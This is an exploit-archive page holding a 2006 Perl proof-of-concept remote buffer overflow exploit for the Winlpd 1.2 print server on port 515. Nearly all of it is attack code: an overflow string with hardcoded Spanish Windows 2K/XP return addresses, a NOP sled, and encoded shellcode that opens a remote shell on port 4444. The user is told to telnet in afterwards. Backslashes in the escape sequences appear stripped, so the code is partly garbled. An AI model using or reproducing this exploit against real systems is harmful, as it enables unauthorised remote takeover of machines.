Winlpd 1.2 Build 1076 Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Winlpd 1.2 Build 1076 Remote Buffer Overflow Exploit
# Published : 2006-07-15
# Author : Pablo Isola
# Previous Title : FileCOPA FTP Server <= 1.01 (LIST) Remote Buffer Overflow Exploit
# Next Title : Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)

#!/usr/bin/perl

####################################################
#
# A proof of concept Remote Buffer Overflow Exploit
#
# App Vulnerable: Winlpd 1.2 Build 1076 - rabox.com
#
# Possibe some problems with WinXP if exploit doesn't
# work correctly, try another number in var 'loop'. 
#
# Buffer size 524 bytes. 
#
# Author: Pablo Isola - neuquencapital@hotmail.com
#
# Neuquen - Patagonia Argentina.
#
# To my friend 'Esteban T.' and all of my friends...
# you know who you are.
#
# Bug Discussion: http://foro.elhacker.net/index.php/topic,131756.htm
####################################################

use Getopt::Std;
use Socket;
my $SOCKET = "";

$loop = 51;  # 51 for Windows 2K and 100 to 120 for Windows XP 
$host = $ARGV[0];
$port = 515;


if (!defined $host){

	print "Error in Params.n";
	print "Usage: winlpd_exp.pl [host] n";
	print "Open remote shell on port 4444n"; 
	exit;
}


print "nA Remote Buffer Overflow Exploitn".
"Coded by Pablo Isola - neuquencapital@hotmail.comnNeuquen - Patagonia Argentinann";


$sc  = "xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17xe0x66";
$sc .= "x1cxc2x83xebxfcxe2xf4x1cx8ex4axc2xe0x66x4fx97xb6";
$sc .= "x31x97xaexc4x7ex97x87xdcxedx48xc7x98x67xf6x49xaa";
$sc .= "x7ex97x98xc0x67xf7x21xd2x2fx97xf6x6bx67xf2xf3x1f";
$sc .= "x9ax2dx02x4cx5exfcxb6xe7xa7xd3xcfxe1xa1xf7x30xdb";
$sc .= "x1ax38xd6x95x87x97x98xc4x67xf7xa4x6bx6ax57x49xba";
$sc .= "x7ax1dx29x6bx62x97xc3x08x8dx1exf3x20x39x42x9fxbb";
$sc .= "xa4x14xc2xbex0cx2cx9bx84xedx05x49xbbx6ax97x99xfc";
$sc .= "xedx07x49xbbx6ex4fxaax6ex28x12x2ex1fxb0x95x05x61";
$sc .= "x8ax1cxc3xe0x66x4bx94xb3xefxf9x2axc7x66x1cxc2x70";
$sc .= "x67x1cxc2x56x7fx04x25x44x7fx6cx2bx05x2fx9ax8bx44";
$sc .= "x7cx6cx05x44xcbx32x2bx39x6fxe9x6fx2bx8bxe0xf9xb7";
$sc .= "x35x2ex9dxd3x54x1cx99x6dx2dx3cx93x1fxb1x95x1dx69";
$sc .= "xa5x91xb7xf4x0cx1bx9bxb1x35xe3xf6x6fx99x49xc6xb9";
$sc .= "xefx18x4cx02x94x37xe5xb4x99x2bx3dxb5x56x2dx02xb0";
$sc .= "x36x4cx92xa0x36x5cx92x1fx33x30x4bx27x57xc7x91xb3";
$sc .= "x0ex1exc2xf1x3ax95x22x8ax76x4cx95x1fx33x38x91xb7";
$sc .= "x99x49xeaxb3x32x4bx3dxb5x46x95x05x88x25x51x86xe0";
$sc .= "xefxffx45x1ax57xdcx4fx9cx42xb0xa8xf5x3fxefx69x67";
$sc .= "x9cx9fx2exb4xa0x58xe6xf0x22x7ax05xa4x42x20xc3xe1";
$sc .= "xefx60xe6xa8xefx60xe6xacxefx60xe6xb0xebx58xe6xf0";
$sc .= "x32x4cx93xb1x37x5dx93xa9x37x4dx91xb1x99x69xc2x88";
$sc .= "x14xe2x71xf6x99x49xc6x1fxb6x95x24x1fx13x1cxaax4d";
$sc .= "xbfx19x0cx1fx33x18x4bx23x0cxe3x3dxd6x99xcfx3dx95";
$sc .= "x66x74x32x6ax62x43x3dxb5x62x2dx19xb3x99xccxc2";

#0x77817477 return address for Windows 2K Professional 5.0.2195 SP4 Spanish
#0x77A12553 return address for Windows XP Professional 5.1.2600 SP1 Spanish

$ret = "x77x74x81x77";  # return address
$nop = "x90" x 16;         # nops for padding
$str = "x41" x 524 .$ret.$nop.$sc;

$iaddr = inet_aton($host)           || die "Unknown host: $hostn";
$paddr = sockaddr_in($port, $iaddr) || die "getprotobyname: $!n";
$proto = getprotobyname('tcp')      || die "getprotobyname: $!n";

for ($j=1;$j<$loop;$j++) {
	
	socket(SOCKET,PF_INET,SOCK_STREAM, $proto) || die "socket: $!n";
	connect(SOCKET,$paddr) || die "Lost Conection: $! .........ay Carumba?n";
	send(SOCKET,$str, 0)	|| die "failure sent: $!n";
	print "nSending string: ".$j;
#	print "nview:n".$str."n";
	sleep(1);
	close SOCKET;
	sleep(1);
}

print "nnTry: telnet remote_ip 4444nn".
"To my friend 'Esteban T.' and to all of my friends...you know who you are.n".
"Have a nice day :)nn"; 

# www.Syue.com [2006-07-15]